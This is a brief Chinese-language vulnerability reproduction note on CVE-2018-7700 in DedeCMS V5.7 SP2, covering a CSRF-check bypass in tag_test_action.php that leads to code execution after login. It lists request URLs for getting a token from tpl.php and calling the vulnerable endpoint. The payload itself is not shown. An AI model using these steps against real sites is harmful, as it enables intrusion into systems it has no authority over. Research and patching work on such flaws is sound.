本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良影响,本文作者概不负责。
漏洞描述
织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。该漏洞的触发文件为 /dede/tag_test_action.php。起因是 csrf_check() 函数的绕过,导致登陆后。可执行任意代码。
CVE编号
CVE-2018-7700
漏洞影响
DedeCMS V5.7
DedeCMS V5.7 SP2
漏洞复现
测试版本为 5.7 SP2,描述中的 csrf_check 没有去验证,据说是因为登陆的时候不会生成 $_SESSION['token']
,因此登陆之后直接将 token 置空即可绕过,但我这里并没有觉得需要绕过这里,登陆后可以直接从其他地方获取 token ,这里主要关注代码执行漏洞。
还是一样,先获取一个 token
http://www.dedecms521.com/dede/tpl.php?action=upload
然后就可以代码执行
http://www.dedecms521.com/dede/tag_test_action.php?token=05e0a0ab271dd01f